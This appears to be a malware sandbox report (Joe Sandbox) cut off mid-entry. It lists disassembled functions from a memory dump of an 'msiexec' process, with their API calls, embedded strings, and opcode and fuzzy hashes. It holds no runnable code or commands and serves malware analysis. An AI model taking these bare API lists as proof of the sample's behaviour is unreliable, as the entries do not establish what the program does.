                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _snwprintfwcscpy
                                                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                                                          • API String ID: 999028693-502967061
                                                                                          • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                          • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                          APIs
                                                                                          • strlen.MSVCRT ref: 00408DFA
                                                                                            • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                          • memset.MSVCRT ref: 00408E46
                                                                                          • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                          • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                          • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                          • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$memsetstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 2350177629-0
                                                                                          • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                          • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                          • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                          • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                          • API String ID: 2221118986-1606337402
                                                                                          • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                          • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                          • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                          • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                          APIs
                                                                                          • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                          • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                          • memset.MSVCRT ref: 00408FD4
                                                                                          • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                          • memset.MSVCRT ref: 00409042
                                                                                          • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                            • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                          • String ID:
                                                                                          • API String ID: 265355444-0
                                                                                          • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                          • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                          • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                          • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 004116FF
                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                          • API String ID: 2618321458-3614832568
                                                                                          • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                          • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFilefreememset
                                                                                          • String ID:
                                                                                          • API String ID: 2507021081-0
                                                                                          • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                          • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                          APIs
                                                                                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                          • malloc.MSVCRT ref: 00417524
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                          • free.MSVCRT ref: 00417544
                                                                                          • free.MSVCRT ref: 00417562
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                          • String ID:
                                                                                          • API String ID: 4131324427-0
                                                                                          • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                          • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                          APIs
                                                                                          • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                          • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                          • free.MSVCRT ref: 0041822B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: PathTemp$free
                                                                                          • String ID: %s\etilqs_$etilqs_
                                                                                          • API String ID: 924794160-1420421710
                                                                                          • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                          • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040FDD5
                                                                                            • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                          • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                          • API String ID: 1775345501-2769808009
                                                                                          • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                          • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                          • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                          • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastMessage_snwprintf
                                                                                          • String ID: Error$Error %d: %s
                                                                                          • API String ID: 313946961-1552265934
                                                                                          • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                          • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: foreign key constraint failed$new$oid$old
                                                                                          • API String ID: 0-1953309616
                                                                                          • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                          • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                          • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                          • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                          APIs
                                                                                          Strings
                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy
                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                          • API String ID: 3510742995-272990098
                                                                                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                          APIs
                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                            • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                          • memset.MSVCRT ref: 0040C439
                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                          • _wcsupr.MSVCRT ref: 0040C481
                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                          • memset.MSVCRT ref: 0040C4D0
                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                                          • String ID:
                                                                                          • API String ID: 1265369119-0
                                                                                          • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                          • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0044A6EB
                                                                                          • memset.MSVCRT ref: 0044A6FB
                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpymemset
                                                                                          • String ID: gj
                                                                                          • API String ID: 1297977491-4203073231
                                                                                          • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                          • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                          APIs
                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                          • free.MSVCRT ref: 0040E9D3
                                                                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@$free
                                                                                          • String ID:
                                                                                          • API String ID: 2241099983-0
                                                                                          • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                          • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                          • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                          • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                          APIs
                                                                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                          • malloc.MSVCRT ref: 004174BD
                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                          • free.MSVCRT ref: 004174E4
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                          • String ID:
                                                                                          • API String ID: 4053608372-0
                                                                                          • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                          • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                          APIs
                                                                                          • GetParent.USER32(?), ref: 0040D453
                                                                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                          • String ID:
                                                                                          • API String ID: 4247780290-0
                                                                                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                          APIs
                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                          • memset.MSVCRT ref: 004450CD
                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                          • String ID:
                                                                                          • API String ID: 1471605966-0
                                                                                          • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                          • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                          APIs
                                                                                          • wcscpy.MSVCRT ref: 0044475F
                                                                                          • wcscat.MSVCRT ref: 0044476E
                                                                                          • wcscat.MSVCRT ref: 0044477F
                                                                                          • wcscat.MSVCRT ref: 0044478E
                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                          • String ID: \StringFileInfo\
                                                                                          • API String ID: 102104167-2245444037
                                                                                          • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                          • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                          APIs
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@
                                                                                          • String ID:
                                                                                          • API String ID: 613200358-0
                                                                                          • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                          • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                          • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                          • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
